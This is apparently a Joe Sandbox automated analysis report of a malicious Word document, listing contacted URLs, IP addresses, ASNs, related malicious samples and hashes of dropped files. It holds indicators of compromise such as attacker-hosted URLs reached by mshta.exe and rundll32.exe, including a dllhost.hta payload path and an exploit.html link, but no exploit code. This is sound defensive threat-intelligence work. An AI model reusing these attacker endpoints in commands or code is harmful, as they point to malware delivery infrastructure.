        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
        http://159.75.135.162:61256/dllhost.htaindowsINetCookiesF&0%Avira URL Cloudsafe
        https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
        https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
        https://officeci.azurewebsites.net/api/0%URL Reputationsafe
        http://159.75.135.162:61256/dllhost.htaV0%Avira URL Cloudsafe
        https://store.office.cn/addinstemplate0%URL Reputationsafe
        http://159.75.135.162:61256/dllhost.htaY0%Avira URL Cloudsafe
        https://api.aadrm.com0%URL Reputationsafe
        https://106.55.17.200:62002/0%Avira URL Cloudsafe
        https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
        https://www.odwebp.svc.ms0%URL Reputationsafe
        https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
        http://159.75.135.162:61256/dllhost.htag0%Avira URL Cloudsafe
        https://dataservice.o365filtering.com/0%URL Reputationsafe
        http://159.75.135.162:61256/dllhost.htaET4.C:0%Avira URL Cloudsafe
        https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
        https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
        https://ncus.contentsync.0%URL Reputationsafe
        https://apis.live.net/v5.0/0%URL Reputationsafe
        https://wus2.contentsync.0%URL Reputationsafe
        https://asgsmsproxyapi.azurewebsites.net/0%URL Reputationsafe
        https://106.55.17.200/0%Avira URL Cloudsafe
        https://106.55.17.200:62002/jquery-3.3.1.slim.min.js0%Avira URL Cloudsafe
        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
        No contacted domains info
        NameMaliciousAntivirus DetectionReputation
        http://106.55.17.200/jquery-3.3.1.slim.min.jstrue
        • Avira URL Cloud: safe
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://api.diagnosticssdf.office.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
          high
          https://login.microsoftonline.com/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
            high
            https://shell.suite.office.com:1443898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
              high
              https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                high
                https://autodiscover-s.outlook.com/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                  high
                  https://roaming.edog.898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                  • URL Reputation: safe
                  unknown
                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                    high
                    https://cdn.entity.898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                    • URL Reputation: safe
                    unknown
                    https://api.addins.omex.office.net/appinfo/query898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                      high
                      https://clients.config.office.net/user/v1.0/tenantassociationkey898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                        high
                        https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                          high
                          https://powerlift.acompli.net898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                          • URL Reputation: safe
                          unknown
                          https://rpsticket.partnerservices.getmicrosoftkey.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                          • URL Reputation: safe
                          unknown
                          https://lookup.onenote.com/lookup/geolocation/v1898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                            high
                            https://cortana.ai898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                            • URL Reputation: safe
                            unknown
                            https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                              high
                              https://cloudfiles.onenote.com/upload.aspx898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                high
                                https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                  high
                                  https://entitlement.diagnosticssdf.office.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                    high
                                    https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                      high
                                      https://api.aadrm.com/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://ofcrecsvcapi-int.azurewebsites.net/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                        high
                                        https://api.microsoftstream.com/api/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                          high
                                          https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                            high
                                            https://cr.office.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                              high
                                              https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                              • Avira URL Cloud: safe
                                              low
                                              http://159.75.135.162:61256/dllhost.htaindowsINetCookiesF&mshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://portal.office.com/account/?ref=ClientMeControl898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                high
                                                https://graph.ppe.windows.net898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                  high
                                                  https://res.getmicrosoftkey.com/api/redemptionevents898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://powerlift-frontdesk.acompli.net898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://tasks.office.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                    high
                                                    https://officeci.azurewebsites.net/api/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://sr.outlook.office.net/ws/speech/recognize/assistant/work898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                      high
                                                      http://159.75.135.162:61256/dllhost.htaVmshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://store.office.cn/addinstemplate898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://159.75.135.162:61256/dllhost.htaYmshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://api.aadrm.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://106.55.17.200:62002/rundll32.exe, 0000001E.00000002.556713488.0000000002DDA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://outlook.office.com/autosuggest/api/v1/init?cvid=898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                        high
                                                        https://globaldisco.crm.dynamics.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                          high
                                                          https://messaging.engagement.office.com/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                            high
                                                            https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                              high
                                                              https://dev0-api.acompli.net/autodetect898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://www.odwebp.svc.ms898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://api.diagnosticssdf.office.com/v2/feedback898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                high
                                                                https://api.powerbi.com/v1.0/myorg/groups898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                  high
                                                                  https://web.microsoftstream.com/video/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                    high
                                                                    https://api.addins.store.officeppe.com/addinstemplate898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://graph.windows.net898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                      high
                                                                      http://159.75.135.162:61256/dllhost.htagmshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://dataservice.o365filtering.com/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://159.75.135.162:61256/dllhost.htaET4.C:mshta.exe, 00000019.00000002.559444903.0000000000A6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://officesetup.getmicrosoftkey.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://analysis.windows.net/powerbi/api898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                        high
                                                                        https://prod-global-autodetect.acompli.net/autodetect898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://outlook.office365.com/autodiscover/autodiscover.json898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                          high
                                                                          https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                            high
                                                                            https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                              high
                                                                              https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                high
                                                                                https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                  high
                                                                                  https://ncus.contentsync.898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                    high
                                                                                    https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                      high
                                                                                      http://weather.service.msn.com/data.aspx898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                        high
                                                                                        https://apis.live.net/v5.0/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                          high
                                                                                          https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                            high
                                                                                            https://messaging.lifecycle.office.com/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                              high
                                                                                              https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                high
                                                                                                https://management.azure.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                  high
                                                                                                  https://outlook.office365.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                    high
                                                                                                    https://wus2.contentsync.898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://incidents.diagnostics.office.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                      high
                                                                                                      https://clients.config.office.net/user/v1.0/ios898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                        high
                                                                                                        https://insertmedia.bing.office.net/odc/insertmedia898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                          high
                                                                                                          https://o365auditrealtimeingestion.manage.office.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                            high
                                                                                                            https://outlook.office365.com/api/v1.0/me/Activities898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                              high
                                                                                                              https://api.office.net898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                high
                                                                                                                https://incidents.diagnosticssdf.office.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                  high
                                                                                                                  https://asgsmsproxyapi.azurewebsites.net/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://clients.config.office.net/user/v1.0/android/policies898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                    high
                                                                                                                    https://106.55.17.200/rundll32.exe, 0000001E.00000002.556934937.0000000002E27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://entitlement.diagnostics.office.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                      high
                                                                                                                      https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                        high
                                                                                                                        https://substrate.office.com/search/api/v2/init898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                          high
                                                                                                                          https://outlook.office.com/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                            high
                                                                                                                            https://storage.live.com/clientlogs/uploadlocation898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                              high
                                                                                                                              https://outlook.office365.com/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                                high
                                                                                                                                https://webshell.suite.office.com898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://substrate.office.com/search/api/v1/SearchHistory898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://106.55.17.200:62002/jquery-3.3.1.slim.min.jsrundll32.exe, 0000001E.00000002.556915406.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.556560356.0000000002D6B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.556713488.0000000002DDA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://management.azure.com/898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://messaging.lifecycle.office.com/getcustommessage16898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://clients.config.office.net/c2r/v1.0/InteractiveInstallation898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://login.windows.net/common/oauth2/authorize898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              • No. of IPs < 25%
                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                              • 75% < No. of IPs
                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                              159.75.135.162
                                                                                                                                              unknownChina
                                                                                                                                              1257TELE2EUfalse
                                                                                                                                              101.33.231.81
                                                                                                                                              unknownChina
                                                                                                                                              132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNtrue
                                                                                                                                              IP
                                                                                                                                              192.168.2.1
                                                                                                                                              Joe Sandbox Version:35.0.0 Citrine
                                                                                                                                              Analysis ID:647003
                                                                                                                                              Start date and time: 16/06/202214:18:502022-06-16 14:18:50 +02:00
                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                              Overall analysis duration:0h 7m 59s
                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                              Report type:full
                                                                                                                                              Sample file name:V3g2Pfu707.docx
                                                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                              Run name:Potential for more IOCs and behavior
                                                                                                                                              Number of analysed new started processes analysed:35
                                                                                                                                              Number of new started drivers analysed:1
                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                              Technologies:
                                                                                                                                              • HCA enabled
                                                                                                                                              • EGA enabled
                                                                                                                                              • HDC enabled
                                                                                                                                              • AMSI enabled
                                                                                                                                              Analysis Mode:default
                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                              Detection:MAL
                                                                                                                                              Classification:mal92.troj.expl.evad.winDOCX@18/34@0/3
                                                                                                                                              EGA Information:Failed
                                                                                                                                              HDC Information:Failed
                                                                                                                                              HCA Information:
                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                              • Number of executed functions: 0
                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                              Cookbook Comments:
                                                                                                                                              • Found application associated with file extension: .docx
                                                                                                                                              • Adjust boot time
                                                                                                                                              • Enable AMSI
                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                              • Attach to Office via COM
                                                                                                                                              • Scroll down
                                                                                                                                              • Close Viewer
                                                                                                                                              • Exclude process from analysis (whitelisted): sdiagnhost.exe, mrxdav.sys, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                              • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.76.141, 52.109.88.37, 52.109.76.34, 52.109.88.38, 52.109.88.40
                                                                                                                                              • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                              • Execution Graph export aborted for target mshta.exe, PID 5852 because there are no executed function
                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                              No simulations
                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                              101.33.231.81V3g2Pfu707.docxGet hashmaliciousBrowse
                                                                                                                                              • 101.33.231.81:62563/exploit.html
                                                                                                                                              No context
                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                              TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNV3g2Pfu707.docxGet hashmaliciousBrowse
                                                                                                                                              • 101.33.231.81
                                                                                                                                              Camera Translator Pro_1.1.apkGet hashmaliciousBrowse
                                                                                                                                              • 162.62.150.165
                                                                                                                                              Camera Translator Pro_1.1.apkGet hashmaliciousBrowse
                                                                                                                                              • 170.106.48.121
                                                                                                                                              i9YeKJfeedGet hashmaliciousBrowse
                                                                                                                                              • 101.34.175.187
                                                                                                                                              LFezjVqTgC.exeGet hashmaliciousBrowse
                                                                                                                                              • 150.109.149.99
                                                                                                                                              Bk21Qe4LsF.exeGet hashmaliciousBrowse
                                                                                                                                              • 101.32.224.111
                                                                                                                                              8nXO11FvreGet hashmaliciousBrowse
                                                                                                                                              • 124.156.39.100
                                                                                                                                              Digitize PDF Scanner_1.0.4.apkGet hashmaliciousBrowse
                                                                                                                                              • 101.32.92.191
                                                                                                                                              Digitize PDF Scanner_1.0.4.apkGet hashmaliciousBrowse
                                                                                                                                              • 101.32.92.198
                                                                                                                                              A8nzPZ6G6AGet hashmaliciousBrowse
                                                                                                                                              • 162.63.47.4
                                                                                                                                              XSH0YkOfjlGet hashmaliciousBrowse
                                                                                                                                              • 101.34.151.39
                                                                                                                                              Chat Stickers_1.0.apkGet hashmaliciousBrowse
                                                                                                                                              • 101.32.92.201
                                                                                                                                              Chat Stickers_1.0.apkGet hashmaliciousBrowse
                                                                                                                                              • 101.32.92.198
                                                                                                                                              com.enos.mobile.newenergy_11881447_50997895.apkGet hashmaliciousBrowse
                                                                                                                                              • 129.226.103.217
                                                                                                                                              com.enos.mobile.newenergy_11881447_50997895.apkGet hashmaliciousBrowse
                                                                                                                                              • 129.226.103.217
                                                                                                                                              kruma.x86Get hashmaliciousBrowse
                                                                                                                                              • 101.33.185.236
                                                                                                                                              wFD89MrGNXGet hashmaliciousBrowse
                                                                                                                                              • 119.28.5.236
                                                                                                                                              Mini PDF Scanner_1.1.29_1.apkGet hashmaliciousBrowse
                                                                                                                                              • 101.32.92.191
                                                                                                                                              armGet hashmaliciousBrowse
                                                                                                                                              • 124.157.170.165
                                                                                                                                              arm7Get hashmaliciousBrowse
                                                                                                                                              • 203.205.156.143
                                                                                                                                              TELE2EUpandora.armGet hashmaliciousBrowse
                                                                                                                                              • 80.170.65.232
                                                                                                                                              NPZ3SWScH6Get hashmaliciousBrowse
                                                                                                                                              • 91.128.242.163
                                                                                                                                              xuaw4X8PE7Get hashmaliciousBrowse
                                                                                                                                              • 90.132.110.35
                                                                                                                                              Dq86sP9GwMGet hashmaliciousBrowse
                                                                                                                                              • 83.176.190.193
                                                                                                                                              ClimaxoilfieldXgescanntes-DokumentX2022.13.06_1044.xlsGet hashmaliciousBrowse
                                                                                                                                              • 91.130.102.123
                                                                                                                                              52mgI7iOxcGet hashmaliciousBrowse
                                                                                                                                              • 130.244.102.35
                                                                                                                                              drLLRNbX4TGet hashmaliciousBrowse
                                                                                                                                              • 159.75.143.195
                                                                                                                                              2Kg7m11O2YGet hashmaliciousBrowse
                                                                                                                                              • 83.176.89.177
                                                                                                                                              F9d5ol32UTGet hashmaliciousBrowse
                                                                                                                                              • 91.131.88.135
                                                                                                                                              i9YeKJfeedGet hashmaliciousBrowse
                                                                                                                                              • 159.72.220.16
                                                                                                                                              vailon.mipsGet hashmaliciousBrowse
                                                                                                                                              • 193.217.5.152
                                                                                                                                              vailon.armGet hashmaliciousBrowse
                                                                                                                                              • 83.183.143.158
                                                                                                                                              QRJCdtkHy6Get hashmaliciousBrowse
                                                                                                                                              • 90.144.148.207
                                                                                                                                              YHQxlHBzZbGet hashmaliciousBrowse
                                                                                                                                              • 5.240.238.207
                                                                                                                                              LA13Wfso9KGet hashmaliciousBrowse
                                                                                                                                              • 83.184.207.70
                                                                                                                                              lessie.armGet hashmaliciousBrowse
                                                                                                                                              • 159.79.180.184
                                                                                                                                              sO4p2ng9bvGet hashmaliciousBrowse
                                                                                                                                              • 193.14.162.219
                                                                                                                                              KyEBxcB74xGet hashmaliciousBrowse
                                                                                                                                              • 91.130.14.21
                                                                                                                                              lheJ0BlYagGet hashmaliciousBrowse
                                                                                                                                              • 91.128.130.0
                                                                                                                                              gatox86Get hashmaliciousBrowse
                                                                                                                                              • 83.179.44.222
                                                                                                                                              No context
                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                              C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\DiagPackage.dll5YMh6S8QVr.docxGet hashmaliciousBrowse
                                                                                                                                                ZDhoKQk8G6.docxGet hashmaliciousBrowse
                                                                                                                                                  TranQuangDai.docxGet hashmaliciousBrowse
                                                                                                                                                    doc782.docxGet hashmaliciousBrowse
                                                                                                                                                      68101181_048154.imgGet hashmaliciousBrowse
                                                                                                                                                        doc782.docxGet hashmaliciousBrowse
                                                                                                                                                          doc1712.docxGet hashmaliciousBrowse
                                                                                                                                                            R346ltaP9w.rtfGet hashmaliciousBrowse
                                                                                                                                                              VIP Invitation to Doha Expo 2023.docxGet hashmaliciousBrowse
                                                                                                                                                                WykHEO9BQN.rtfGet hashmaliciousBrowse
                                                                                                                                                                  lol666 (2).batGet hashmaliciousBrowse
                                                                                                                                                                    EISPv0c56U.docGet hashmaliciousBrowse
                                                                                                                                                                      mjpoc_slide.docGet hashmaliciousBrowse
                                                                                                                                                                        mjpoc_slide.docGet hashmaliciousBrowse
                                                                                                                                                                          05-2022-0438.docGet hashmaliciousBrowse
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:Microsoft Access Database
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):528384
                                                                                                                                                                            Entropy (8bit):0.4747870240005237
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:LGfXq/JCQq8SFYfZ0jGB7wAUFgWCQwtZ1IX+hVZO4Fg:ifXqCJHoZJHgTCQ/kI
                                                                                                                                                                            MD5:12112B6883306BD90398B9A7656963A9
                                                                                                                                                                            SHA1:D1CCC28F7C0EB31D4DA0A482B666BB9F3033BE2E
                                                                                                                                                                            SHA-256:028E95FEE1637EA8873C77BBA6E9C7ADC65179D2808AA74E148DB93EC32EF04F
                                                                                                                                                                            SHA-512:F5F26D241D3802BD1358126779FBF02DC0BDC381C49B5F6B881FCD33828A7F2D8373D162C8027D20B28CF8590CB76F1591DA74CD80304D114C2AA1ADF33A2539
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...N>U.7...~.(...`.:{6M...Z.Cw..3..y[*.|*..|......~;...f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):36
                                                                                                                                                                            Entropy (8bit):2.730660070105504
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:5NixJlElGUR:WrEcUR
                                                                                                                                                                            MD5:1F830B53CA33A1207A86CE43177016FA
                                                                                                                                                                            SHA1:BDF230E1F33AFBA5C9D5A039986C6505E8B09665
                                                                                                                                                                            SHA-256:EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
